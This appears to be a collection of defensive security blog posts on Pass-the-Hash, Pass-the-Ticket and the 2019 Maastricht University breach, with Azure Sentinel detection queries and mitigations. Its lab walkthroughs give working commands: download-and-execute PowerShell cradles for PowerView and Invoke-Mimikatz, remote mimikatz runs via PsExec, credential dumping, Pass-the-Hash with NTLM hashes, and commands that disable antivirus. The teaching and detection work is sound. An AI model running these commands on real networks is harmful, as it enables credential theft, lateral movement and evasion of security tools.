Pass-the-Hash is still a nuclear bomb

Introduction

Pass-the-Hash is a very old technique, but despite that it’s old. It is still used a lot to attack networks. This blog post was meant for my students to have a better understanding about this technique, but also understand how to mitigate it. Pass-the-Hash forms a part of lateral movement.

A Pass-the-Hash attack is an technique whereby an attacker is capturing the NT hash of a compromised system and then pass it through authentication without having access to the user’s password in clear text. After the password hash(es) has been obtained by an attacker. It is use to trick an authentication system into creating a new authentication session on behalf of a compromised user.

Once the attacker is authenticated as the compromised user. It is possible for an attacker to move laterally to other systems with PsExec, WinRM, etc.

Credits goes to the Microsoft Mitigating PtH attack whitepaper

Credential Access

As mentioned before. An attacker first need to obtain credentials to execute a PtH attack, but where are these credentials stored?

When a password is created in Windows. It is stored in different places, such as the local SAM database, LSASS process and the Active Directory database (NTDS.DIT)

In this blog post, we’re going to focus on the SAM database and the LSASS process the most.

Security Account Manager (SAM)

Windows stores the local users and groups in the Security Account Manager (SAM) database and it authenticates local users their logon. Every Windows computer has a SAM database that contains information about local users and groups.

Here are all the local users that we’re talking about.

Here are the local groups that we’re talking about.

An important note is that all the passwords of a local user account is hashes and stored in the SAM database to minimize, the risk of having plain-text passwords. Besides of the local SAM, there’s also something that’s called the Local Security Authority (LSA), which validates a user logon attempt by verifying the credentials against the SAM database. If a user entered the correct password that matches with the SAM database. Authentication becomes successfully, if the password didn’t matches the SAM database. Authentication will fail.

Here are the local user accounts with the password hashes that we’re talking about. Compare this image with the first image and you can see all the exact users.

Local Security Authority Subsystem Services (LSASS)

Local Security Authority Subsystem Services (LSASS) is a crucial process that handles user authentication on Windows systems. It manages user credentials secrets, verifies users logging and handles password changes. Attackers often use open-source tools to extract credentials from this process to execute their PtH attack.

Pass-the-Hash with Domain Accounts

An PtH attack often starts with doing reconnaissance to see what kind of access the compromised user has in the network.

C:\Windows\System32> hostname

C:\Windows\System32> whoami

C:\Windows\System32> powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

We have compromised the IdentityClient3 machine that contains a user called Carol. Now we are performing reconnaissance to find local admin access on other systems.

C:\Windows\System32> Find-LocalAdminAccess

As we can see, Carol has local Admin access on a few systems, so we are able to dump credentials from these three systems. Lets start with the IdentityClient1 machine.

PsExec \\IdentityClient1 -s cmd /c C:\x64\mimikatz.exe

Lets dump the credentials from memory now and see what we can get.

sekurlsa::logonPasswords

Credentials of Eve has been obtained, so lets execute a Pass-the-Hash attack to authenticate on behalf of the user Eve.

sekurlsa::pth /user:Eve /domain:IDENTITY.local /ntlm:74f6e03839a3147a74bb9d66dfb5d555 /run:powershell.exe

Unfortunately Eve doesn’t has much access in the network, so lets dump credentials from other systems we have admin privileges on.

Lets now try the WINDOWS2012 machine and perhaps we might have luck on this machine.

PsExec \\WINDOWS212 -s cmd /c C:\x64\mimikatz.exe

Now we are dumping the credentials on the WINDOWS2012 machine

sekurlsa::logonPasswords

With the stolen credentials of the user Reus, we are now performing a Pass-the-Hash attack with his credentials to move further the network.

sekurlsa::pth /user:Reus /domain:IDENTITY.local /ntlm:07c9d2cd613eec8fd2c703052a2bc878 /run:powershell.exe

Now we are going to see what kind of local admin access, Reus has.

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

Find-LocalAdminAccess

Reus has local admin privileges on the FILESERVER, which is always an interesting target. Lets see what we can get there.

PsExec \\FILESERVER -s cmd /c C:\x64\mimikatz.exe

Now we’re going to dump the credentials from the FILESERVER

sekurlsa::logonPasswords

We can see that Bob has recently logged on the FILESERVER. Now we’re going to perform a Pass-the-Hash attack to authenticate as the user Bob.

sekurlsa::pth /user:Bob /domain:IDENTITY.local /ntlm:1b6e6caf9a08a2e18981482d0d84146b /run:powershell.exe

Again, now we’re looking to see what kind of local Admin access our user Bob has in the environment. It seems like we have access to the Domain Controller, so we’re basically already compromised the entire network, but in this example. We will perform a Pass-the-Hash one more time.

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

Find-LocalAdminAccess

This time we will dump the credentials from the SQLSERVER and use those credentials to perform a Pass-the-Hash attack for the last time.

PsExec \\SQLSERVER -s cmd /c C:\x64\mimikatz.exe

sekurlsa::logonPasswords

Last Pass-the-Hash attack as the user Alice.

sekurlsa::pth /user:Alice /domain:IDENTITY.local /ntlm:8cf835b73fcfccbc2840c4e85a530dd2 /run:powershell.exe

And last, but not least. We now have access to the Domain Controller, because our user Alice is also a Domain Admin.

Pass-the-Hash with Local Accounts

In many organization the RID-500 (Administrator) has the same password across all the workstations and member servers in the network. There are different reasons behind this, one is that the password is coming from a golden image, and the second one is that IT admins want to have some master key to access all the systems, when there is a disaster. At least that’s what I’ve heard.

Here we’ve dumped the local SAM database from the WINDOWS2012 machine, and as you can see. There’s a RID-500 account called Testing.

Now we’re going to dump the local SAM database on the FILESERVER machine, and guess what? The RID-500 (Administrator) account has the same password like the WINDOWS2012 machine.

Pass-the-Hash attack with Local Accounts

sekurlsa::pth /user:Testing /domain:FILESERVER /ntlm:7ee68699a16f305b993019ce5f86f05d

Now we have access to the FILESERVER machine through the RID-500 account.

Azure Sentinel Incident Workflow

We can follow the entire attack graph that we just performed, so lets go in to details and investigate this Pass-the-Hash attack in graphs. We know that it all started from the user Carol on the IdentityClient1 machine with tools such as PsExec and Mimikatz.

All the machines that has been use for test purposes are connected with Microsoft Defender ATP and all the logs are centralized in Azure Sentinel.

We are going to start with PsExec which was use frequently in our blog post, so what kind of entities have a relationship with this tool?

As you can see, there are three entities that have a relationship with the PsExec tool, which are also related to accessing credentials from memory.

Now when we’re going into more details of ”sensitive credential memory read”

All the secrets are stored in LSASS as we have read before. Now when taking a look at the different entities. Password hashes has been dumped from LSASS and a possible Pass-the-Hash attack has occured.

It is too much to for this blog post to cover everything that is in Azure Sentinel, but the great thing is that it helps a lot to investigate this types of attacks. Since it displays the attack path in graphs.

Attackers Timeline

Azure Sentinel provides a timeline of all the triggered alerts.

Detecting & Hunting – Queries

TT1003 – Credential Dumping

Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "LSASS process memory modified"
(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Sensitive credential memory read"
(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Passwords hashes dumped from LSASS memory"

T1075 – Pass the Hash

Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Possible pass-the-hash operation"

Recommendations

Despite that there’s a lot guidance around this attack. This attack is still use frequently by attackers to compromise enterprise networks.

  • Domain Admins shouldn’t log on lower trusted servers and workstations, but only Domain Controllers. Local Accounts in the SAM database shouldn’t be able to connect remotely to other systems on the network, and the RID-500 password should be different on all the Windows machines in the network or otherwise an attacker could compromise just one workstation to compromise the entire network.
  • What’s also is important is having a second account to perform administrative tasks, and perhaps if you really want to do it ”securely” is by having a separate hardened workstation to perform administrative tasks.
  • Deny workstation to workstation communications to make lateral movement harder for attackers.
  • Microsoft Administrative Tier Model or similar models is a very great security architecture to mitigate credential theft.
  • Revoke unnecessary users from the local Administrators group.
  • Remote Credential Guard for IT jumpboxes.

Stored Credentials

This is when credentials are stored in LSASS:

Best Practices

Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft, Version 1 and 2

Local Administrator Password Solution (LAPS)

Active Directory administrative tier model

Reference

https://attack.mitre.org/

https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)

Hunting for University of Maastricht breach using Azure Sentinel

Introduction

In October, 2019. University of Maastricht occurred a cyber attack, where criminals were able to get initial access to their internal network. It all started from a phishing mail that successfully targeted users. In that phishing mail, there was a URL with a redirection to a poisoned attachment file, that contains a malicious (Excel) macro. This poisoned attachment was opened on two workstations, which gave attackers the initial foothold they needed.

Fox-IT has performed an incident response with a clear report on how the attackers have operated in the environment of UM. It is clear to say that a lot of traces has left behind by the attackers, but UM didn’t respond to it. All the details can be found here: fox_it_rapport_reactie_universiteit_maastricht

In this blog post, we will analyze the different techniques that have been used by the attackers, but not only that. We will also walk through the capabilities of Defender ATP, Azure ATP and Azure Security Center to detect the TTP’s of the attackers and we will use basic hunting queries to hunt down these types of attacks. Last, but not least. We will use Azure Sentinel to investigate the attack in graphs.

Keep in mind that we won’t go fully in to the details, so don’t expect that we cover the malware samples for instance or all the exact tools that have been used by the attackers. Everything in this blog post is done from an ”assume breach” scenario. Also please understand that it’s impossible to cover the exact way on how the attackers have operated.

Based on the report of Fox-IT, lets start map all the different techniques to MITRE ATT&CK.

TacticTechnique IDTechniqueData Source
Privilege EscalationT1078Valid AccountsMDATP
DiscoveryT1018Remote System RecoveryMDATP
ExecutionT1086PowerShellAzure Security Center / MDAPT
ExecutionT1035New ServiceAzure ATP
Defense EvasionsT1089Disabling Security ToolsMDATP
Credential Access T1003Credential DumpingMDATP
Lateral Movement T1075Pass the HashAzure ATP / MDATP
Credits to MITRE ATT&CK

Attackers timeline:

Attackers were able to get a foothold on two workstations with probably admin privileges. After the foothold has been achieved. They started to perform reconnaissance to find information about different systems.

On 24 October, 2019. Attackers started to use PowerView to perform reconnaissance, but Windows Defender detected it and started to block the malicious script.

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

Since the attackers were an admin on the compromised workstations, it is likely that they turned off Windows Defender.

Set-MpPreference -DisableRealtimeMonitoring $true

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

Now the attackers can perform reconnaissance to discover different kind of information, but it was unclear what kind of information they were looking for, so here are a few examples.

A common thing that attackers are looking for are Domain Admins, because these users have all the rights. Yes, there are more high-privileged groups, but Domain Admin is the most known one.

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

This is the reconnaissance phase were attackers are using the Win32 API to discover local admins on a remote server, which is always interesting information for an attacker.

Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

Other important reconnaissance information is to discover the current local Admin access that the (compromised) user has in the environment.

Find-LocalAdminAccess -Domain test.domain.local

What the attackers also might have done is find sessions on machines, where they have admin privileges on. This is done through the NetSessionEnum API.

Get-NetSession -ComputerName IdentityManager.identity.local

Don’t forget the RDP sessions as well, because admins are RDPing in to every box.

Get-NetRDPSession -ComputerName "IdentityManager"

In the report, there was information about that the attackers were using PingCastle to get a graphical overview on how the UM has set-up their Active Directory.

PingCastle.exe --healthcheck --server domain.local

PingCastle is an audit tool to check the current state of an Active Directory posture. This tool is not considered as an ”hacking” tool, but it is more for auditors. It gives you a graphical overview on the best practices you didn’t implemented, and it generates a report for you with the recommendations.

Afbeeldingsresultaat voor pingcastle report

A lot of information has been discovered by the attackers, so after that. It was the right time to obtain credentials of high-privileged users.

It was unclear on how the attackers were able to get Domain Admin credentials, but it was probably done through compromising other servers and dump the credentials from memory to move further the network.

.\PsExec.exe -accepteula -s \\IdentityManager powershell.exe

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

As we all know. Domain Admins are login everywhere in the environment, which expose their credentials in memory. In this case, the attackers were able to obtain the credentials from the Administrator.UNIMAAS account. This account has Domain Admin privileges in the environment.

After the attackers have obtained the Domain Admin credentials. They started to move laterally to the Domain Controller. This was probably done with a classic Pass-The-Hash attack.

mimikatz # sekurlsa::pth /user:Administrator.UNIMAA /domain:IDENTITY.local /ntlm:c640c20844cdb49ccdd01eaba2550c37

Attackers have now access to the Domain Controller with the compromised account. Which also means that they have access to the most critical server on the network.

PsExec -s \\IDENTITY-DC cmd.exe

Attackers decided to use the Administrator.UNIMAAS account to roll out their ransomware, but McAfee Endpoint Protection was blocking it on one server.

Since they were Domain Admin. All the rights in the network has been obtained, so they decided to disable the McAfee Agent.

First it was done by doing reconnaissance to find the active services on a remote server.

PsExec \\SBESRV0017 net start

When scrolling down to discover all the services. We can see that McAfee is active on the server.

They started to disable McAfee Endpoint Security on the first compromised server

.\PsExec.exe \\SBESRV0017 cmd

"C:\Program Files\McAfee\Agent\x86\frminst.exe" /forceunistall

After they disabled everything on the compromised server(s). They started to roll out their ransomware with the Domain Admin account.

Detection and Hunting Queries

T1018 – Remote System Discovery

Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Suspicious LDAP query"

T1086 – PowerShell

Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Suspicious Powershell Activity Detected"
(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "A malicious PowerShell Cmdlet was invoked on the machine"
(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Suspicious PowerShell command line"

T1035 – Service Execution

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Remote code execution attempt"

T1089 – Disabling Security Tools

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Antimalware Action Failed"

T1003 – Credential Access

Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Passwords hashes dumped from LSASS memory"
(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Suspected credential theft activity"
(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "LSASS process memory modified"

T1075 – Pass the Hash

Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

(SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Possible pass-the-hash operation"

Azure Sentinel Incident Workflow

Entire attack path can be followed through Azure Sentinel, which displays everything in graphs. The most important information in this case is on which machine this attack has been operated, and which user principal was used to launch the attack.

Lets start with the the IdentityClient3.Identity.local machine first and find the different entities that has a relationship. There is a lot of information, but we’re only going to pick the most relevant information.

We can see all the relevant activities that has happened on the compromised workstation.

Now lets take a look at the compromised user, which is in this case. Carol. All the different techniques that were used can be viewed in a graphical manner with all the different entities that have a relationship with each other.

You can also see a summary of the timeline of all the alerts. This was just a part of the timeline, because the image was too long.

Conclusion:

Attackers were very noisy in the environment and alarms were ignored. Logs were collected, but nobody responded to it. A lot of traces has left behind, so besides of collecting logs, UM had to respond to the alerts as well. Monitoring antivirus logs are very valuable, as you can see. In the report it stated that McAfee Endpoint Protection and Windows Defender triggered multiple alerts.

Reference:

https://attack.mitre.org/

Fox-IT Report

@ashwinpatil – For providing valuable feedback and inspiration to this blog post.

Using graphs to track down Identity Snowball Attacks with Azure Sentinel

Attackers have been abusing the functionality of Kerberos for a while and it has been a tough challenge to mitigate these kind of attacks.

In 2009, Microsoft released a whitepaper called ”Heat-Ray”, where they explained this attack in to the details. Identity Snowball Attack leverages the users logged in to a first compromised machine to launch additional attacks with those users privileges on other machines in the network.

It is very common to see that organizations are using Active Directory as their Identity services, where Kerberos is the authentication mechanism. A key feature of Kerberos are the ”tickets”, which are used to retain authentication information, so users don’t need to re-enter their username and password all over the time, when they access a service on the network. This is also known as Single-Sign-On (SSO)

Microsoft explains the Identity Snowball Attack in the context of Kerberos as it is widely deployed.

[Example]

Alice need to provide a secret to her machine by entering a password or using smartcard to proof her identity. The machine of Alice needs this information to obtain a Ticket-Granting-Ticket (TGT) from the Key Distribution Center (KDC).

A TGT forms the authentication token of a user, which is in this case. Alice. TGT’s are issued by the KDC. A TGT grants the machine of Alice to perform actions on Alice’s behalf. The received TGT is stored locally on the machine of Alice to avoid that she needs to provide her secret all the time (SSO).

Now when Alice wants to authenticate to the machine of Bob. She needs to present her TGT to the KDC to obtain a service ticket or known as TGS.

After she has obtained a service ticket. She presents it to the machine of Bob, so the service ticket proves to the machine of Bob that Alice has the permissions to perform actions on her behalf.

This was just a high-level overview of Kerberos, but we didn’t came for this. In this blog post. I will demonstrate the capabilities of Defender ATP combined with Azure Sentinel.

In this scenario, we are going to assume that the machine of Alice has been compromised. The attacker is now going to export all the Kerberos tickets from memory to find Kerberos TGT’s that can be use to move laterally across the network.

All the Kerberos tickets are exported from memory and we can see that Bob has recently logged on the machine of Alice. Now an attacker can use the TGT of Bob for impersonation and access resources on behalf of him.

After Bob got impersonated. An attacker is now able to move laterally across the network and is able to access different systems on the network with the likes of the Domain Controller that holds the keys to the kingdom.

Azure Sentinel has great features to visualize everything in graphs and find all the related attack paths that occurred.

Here we can see that a suspicious process was executed from the user Alice.

Now when we are going to expand further and look for all the activities of Alice. We get a lot more information that can be useful for doing an investigation of a incident.

Left under the bottom, you can see ”Pass-The-Ticket attack”, which is the attack that we just performed. Lets expand that to find more additional information.

We can see that a Pass-The-Ticket was performed on the WINDOWS2012 machine.

Now lets find all the related information that belongs to the WINDOWS2012 machine. Did you remember that we performed a code execution on the IDENTITY-DC machine to get access to the Domain Controller?

Yes, we can see that a code execution on the IDENTITY-DC machine has happened from the WINDOWS2012 machine.

Pass-The-Ticket has always been difficult to detect for most enterprises, but there are solutions of Microsoft that can help a lot, like Defender ATP.

Besides of that. All the logs from Defender ATP can be connected with Azure Sentinel to get this graph, which is useful for doing investigation.

If you do have a Security Operations Center, but you don’t use Azure Sentinel. It is the right time to use it, because it would bring a lot value.

Reference:

Heat-ray: Combating Identity Snowball Attacks Using Machine Learning, Combinatorial Optimization and Attack Graphs

Integrating Defender ATP with Azure Sentinel to detect Pass-The-Hash & Pass-The-Ticket

Defender ATP is an EDR solution of Microsoft that provides multiple security features to mitigate threats on endpoints. (e.g. workstations and servers)

What’s cool about Defender ATP is, that it leverages the power of the Cloud, combined with ”machine learning” and ”user behavior analytics” to provide all the necessary protection to (connected) endpoints.

Defender ATP can be connected with Azure Sentinel to collect all the logs from a central dashboard with other data sources that are connected with it. It is currently in preview mode.

In this blog post, I will demonstrate the capabilities of Defender ATP, when it has been integrated with Azure Sentinel.

It often starts with attackers obtaining credentials from memory to escalate further the network, which is by accessing memory to dump credentials.

Since we have our data source connected with Azure Sentinel. It will show all the relevant information in the dashboard that an attacker has accessed LSASS.

union (SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where DisplayName == "Passwords hashes dumped from LSASS memory"
This image has an empty alt attribute; its file name is image-2.png

There are different field levels in the event log that is generated to indicate an exposure. As you can see in the following screenshot. Lsass.exe has been accessed.

C:\Windows\System32\lsass.exe

At the other field levels, there are other additional information with the likes of, on which machine it has happened, and which user has performed this operation.

Another similar event is Sensitive credential read from memory that points out, that it is a part of another incident. This event is a bit more accurate than the above one, because it provides more context.

union (SecurityAlert | where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Sensitive credential memory read"

In Azure Sentinel you won’t find this information, but when you go to the Microsoft Defender Portal. It shows the following, which is more accurate. Sensitive credential memory read is part of a possible pass-the-hash operation.

After the credentials have been obtained from memory, there are different ways to move further, which is by performing a classic attack, such as Pass-The-Hash for example.

Defender ATP will indicate that a ”possible” pass-the-hash occurred with the additional information.

union (SecurityAlert | where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Possible pass-the-hash operation"

In the description field it says the following: “Memory was read from the LSASS process in a way that is consistent with a pass-the-hash attack. Pass-the-hash works by reading hashed passwords from LSASS process memory and applying one of the hashes in another context to authenticate as the user of that hashed password”

Detecting Pass-The-Hash with Defender ATP is much easier then filtering on specific event ID’s that are generated through Event Viewer. Event Viewer requires things like filtering to reduce false positives, but the chance that a false positive will occur is much higher then detecting it with Defender ATP.

Pass-The-Hash is still a well known attack and forms a danger for most organizations, because it is not something you can easily prevent.

Last, but not least. There is another famous attack vector called ”Pass-The-Ticket, which is a method of authenticating to a system using Kerberos tickets without having access to an account’s password.

The first thing is to export Kerberos TGT’s from memory that we can use later to impersonate a user. In this example, Bob the Domain Admin will be impersonated, because he left his credentials behind on a machine that we’ve just compromised.

After Bob’s TGT has been exported from memory, we can impersonate him and access resources on behalf of Bob.

Defender ATP alerts this attack with a High priority and all the additional information related to it.

union (SecurityAlert
| where ProviderName != 'ASI Scheduled Alerts' and ProviderName != 'CustomAlertRule')
| where AlertName == "Pass-the-ticket attack"

All the information such as, on which endpoint this attack has occurred and which user performed this attack is exposed in the metadata.

Wait, there is more. In the Microsoft Defender portal, there is more information that can help you triage this alert on a much efficient way, when doing an investigation. At the ExtendedLinks attribute. You can visit the URL that redirects you to the portal.

As you can see in the screenshot. This is the incident graph, that something is happening on a client machine.

In this case, we were exporting Kerberos tickets from memory and that is not a normal behavior.

There is an exact timeline that shows you all the exported Kerberos tickets on a machine.

Both Pass-The-Hash and Pass-The-Ticket are well known techniques and frequently used by attackers to compromise Active Directory, but it has always been difficult to detect it. Thanks to Defender ATP it has been improved, so if you have the chance to use it. Go for it, because it is amazing.

Keep in mind that OverPass-The-Hash has not been covered, because Defender ATP doesn’t alert on it. Azure ATP does has the capabilities to detect it, but I will blog later about that.

Active Directory Security Assessment – ADSA

Active Directory or often described as the ”backbone” of identities, which has been around for 20 years. Is publicly known for managed poorly, and because of this. Attackers have taken their advantages.

Since there is a lot of information on the internet on how you can use open-source tools to attack AD. It should not be a surprise anymore if attackers were going after Active Directory.

Because all of this. Organizations need to audit their own environment to discover insecure configurations and address them. It is very easy to find misconfigurations if nobody has ever looked to it. Yes, especially. Organizations who have outsourced their entire IT.

ADSA provides a great foundation to find (common) misconfigurations, but it not only limited to that. It provides both technical and non-technical recommendations on improving the security posture.

ADSA is an improved version of the Active Directory Security Fundamentals, which goes a bit more into the details. It does not immediately means that an organization will be 100% secure, if all the recommendations are followed.

Nevertheless, everything has been tested in an environment, and it is recommended to test stuff first, before deploying changes in production.

Attacking Active Directory for fun and profit

Active Directory underpins the majority of most organisations their IT infrastructure, which makes it a valuable target for attackers.

A lot of (targeted) ransomware attacks have been leveraging through AD, and I often get question on, how attackers are compromising an AD environment, so I thought it would be the right time to publish content about this topic, to help people having a better understanding on the different exploitation techniques, that might be used to take advantage of insecure or default settings in AD.

Vitali Kremez gave last year a nice talk on how cyber crime groups are attacking AD for fun and profit, which inspired me to choose that title as well, but I wanted to focus it more on the different exploitation techniques. The talk of Vitali can be found here:

There are a lot of recommendations that organizations should follow to secure Active Directory, but sometimes it is better to know, how it is done practical to have a better understanding on the risks behind a poor configuration.

I have published a PDF with the different exploitation techniques that can be used to attack Active Directory with recommendations on how to secure it.

This can be found here: